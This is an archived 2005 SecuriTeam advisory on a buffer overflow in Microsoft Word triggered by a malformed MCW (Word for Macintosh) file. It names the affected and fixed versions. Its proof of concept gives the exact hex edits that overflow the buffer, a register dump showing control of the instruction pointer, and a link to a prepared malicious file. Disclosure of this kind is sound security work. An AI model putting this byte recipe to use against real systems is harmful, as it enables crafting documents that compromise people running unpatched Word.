[NT] MS Word Unicode Buffer Overflow (MCW)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/05

  • Next message: SecuriTeam: "[NT] Warrior Kings: Battles Fromat String"
    To: list@securiteam.com
    Date: 26 May 2005 18:20:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      MS Word Unicode Buffer Overflow (MCW)
    ------------------------------------------------------------------------

    SUMMARY

    Microsoft Word is "a word processor program from Microsoft. It was
    originally written by Richard Brodie for IBM PC computers running DOS in
    1983. Later versions were created for the Apple Macintosh (1984), SCO
    UNIX, and Microsoft Windows (1989). It became part of the Microsoft Office
    suite".

    Microsoft Word is vulnerable to buffer overflow while opening maliciously
    crafted Unicode MCW (Word for Macintosh Document) file.

    DETAILS

    Vulnerable Systems:
     * Winword.exe version 10.2627.6714 and prior

    Immune Systems:
     * Microsoft Word 2002 Service Pack 3

    The Unicode buffer overflow occurs when the user opens malformed MCW
    document.

    Proof of concept:
    Modify the MCW file by using binary editor as follows, these lines were
    taken from an MCW file:
    c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
    00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
    11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
    00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77

    Change them as follows:
    c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
    00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
    11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
    61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73

    EAX = 00000000 EBX = 00000000 ECX = 00000006
    EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
    EIP = 00410041 ESP = 00126110 EBP = 00410041
    EFL = 00000246

    A modified MCW file can be downloaded from:
     <http://study.haifa.ac.il/~bnaamnih/word/foo.mcw>
    http://study.haifa.ac.il/~bnaamnih/word/foo.mcw

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:b_naamneh@hotmail.com> Bahaa
    Naamneh.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Warrior Kings: Battles Fromat String"

    Relevant Pages

    • [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ...
      (Securiteam)
    • [NT] Microsoft Word RTF File Parsing Heap Corruption Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word RTF File Parsing Heap Corruption Vulnerability ... Microsoft Word is "a word processing application from Microsoft Office. ... Rich Text Format (RTF) is a document file format developed by Microsoft ...
      (Securiteam)
    • [NT] Microsoft WORD Hlink Local Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft WORD Hlink Local Buffer Overflow ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP ... "takes over" and opens that doc file. ... http://example.com/myfile.doc is a valid request. ...
      (Securiteam)
    • [NT] Microsoft Word Font Parsing Buffer Overflow Vulnerability (Technical Details, MS-05-035)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word is the word processing component of the ... * 24.03.05 - Initial vendor response ...
      (Securiteam)